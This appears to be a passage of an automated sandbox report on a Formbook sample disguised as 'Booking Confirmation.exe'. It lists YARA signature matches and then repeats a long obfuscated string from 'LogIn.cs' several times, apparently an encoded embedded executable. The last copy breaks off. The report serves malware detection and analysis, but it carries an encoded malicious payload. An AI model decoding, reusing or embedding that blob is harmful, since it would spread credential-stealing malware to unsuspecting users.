            Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Booking Confirmation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Booking Confirmation.exe, LogIn.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
            Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, LogIn.csBase64 encoded string: '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